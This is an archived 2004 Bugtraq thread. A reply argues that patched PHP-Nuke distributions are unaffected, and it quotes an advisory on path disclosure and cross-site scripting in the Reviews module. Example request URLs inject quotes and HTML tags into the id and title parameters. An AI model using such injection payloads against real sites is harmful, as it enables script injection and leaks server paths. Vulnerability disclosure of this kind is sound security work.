Bugtraq mailing list archives
RE: Multiple vulnerabilities PHP-Nuke
From: Jeruvy <jeruvy () shaw ca>
Date: Tue, 08 Jun 2004 09:33:01 -0600
This does not apply to any site that has applied the security fixes available for many, many months. This is only affecting phpnuke.org distro's, not any 'modified' or 'secured' distro, like betaNC, CPG-NUKE, and others... No additional patches dealing with these specifics below applied to php-nuke 7.0 only the security patches. A. Generates a proper ACCESS DENIED page, no PATH DISCLOSURE. ------------------------------------------------------------- RESULT: "You are trying to access a restricted area. We are Sorry, but this section of our site is for Registered Users Only. You can register for free by clicking here, then you can access this section without restrictions. Thanks." B. No CSS exploit. Same result as above. Below example was sanitized prior to GET: ------------------------------------------------------------------------ ------------ RESULT: modules.php?name=Reviews&rop=postcomment&id='%3Ch1%3EDarkBicho%3C/h1&tit le=a modules.php?name=Reviews&rop=postcomment&id='&title=%3Ch1%3EDarkBicho%3C /h1%3E So as long as you've addressed the age-old bugs that still haven't been fixed in the basic PHP-Nuke distro's then you may be vulnerable. However these methods have long been squashed in patches available, and do not affect newer, secure distro's such as betaNC or CPG-Nuke. Again, I added no new patches to test these potentials in the last 30 days. And they simply are not a factor. Sincerely, J. j e r u v y a t s h a w d o t c a -----Original Message Below----- From: Dark Bicho [mailto:k1ll3rb0y () hotmail com] Sent: Monday, June 07, 2004 3:31 PM To: full-disclosure () lists netsys com; bugtraq () securityfocus com Subject: Multiple vulnerabilities PHP-Nuke original advisory : http://bichosoft.webcindario.com/advisory-05.txt ------------------------------------------------------------------------ ------------------------- :.: Multiple vulnerabilities PHP-Nuke :.: PROGRAM: PHP-Nuke HOMEPAGE: http://phpnuke.org/ VERSION: 6.x, 7.2, 7.3 BUG: Multiple vulnerabilities DATE: 14/05/2004 AUTHOR: DarkBicho web: http://www.darkbicho.tk team: Security Wari Proyects <www.swp-zone.org> Email: darkbicho () peru com ------------------------------------------------------------------------ ------------------------- 1.- Affected software description: ----------------------------- Php-Nuke is a popular content management system, written in php by Francisco Burzi. 2.- Vulnerabilities: --------------- A. Full path disclosure: This vulnerability would allow a remote user to determine the full path to the web root directory and other potentially sensitive information. :.: Examples: http://localhost/nuke1/modules.php?name=Reviews&rop=showcontent&id='Dark Bicho Warning: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in c:\appserv\www\nuke1\modules\Reviews\index.php on line 527 B. Cross-Site Scripting aka XSS: :.: id : * http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&tit le=a <input type=hidden name=id value='> :.: title : * http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&tit le=a :.: Examples: http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='<h1> DarkBicho</h1&title=a http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&tit le=<h1>DarkBicho</h1> 3.- SOLUTION: ¨¨¨¨¨¨¨¨ Vendors were contacted many weeks ago and plan to release a fixed version soon. Check the PHP-NUKE website for updates and official release details. 4.- Greetings: --------- greetings to my Peruvian group swp and perunderforce :D "EL PISCO ES Y SERA PERUANO" 5.- Contact ------- WEB: http://www.darkbicho.tk EMAIL: darkbicho () peru com ------------------------------------------------------------------------ ------------------------- ___________ ____________ / _____/ \ / \______ \ \_____ \\ \/\/ /| ___/ / \\ / | | /_______ / \__/\ / |____| \/ \/ Security Wari Projects (c) 2002 - 2004 Made in Peru ----------------------------------------[ EOF ]---------------------------------------------- _________________________________________________________________ Consigue aquí las mejores y mas recientes ofertas de trabajo en América Latina y USA: http://latam.msn.com/empleos/
Current thread:
- Multiple vulnerabilities PHP-Nuke Dark Bicho (Jun 07)
- RE: Multiple vulnerabilities PHP-Nuke Jeruvy (Jun 08)
- <Possible follow-ups>
- Re: Multiple vulnerabilities PHP-Nuke Squid (Jun 10)
- RE: Multiple vulnerabilities PHP-Nuke Jeruvy (Jun 12)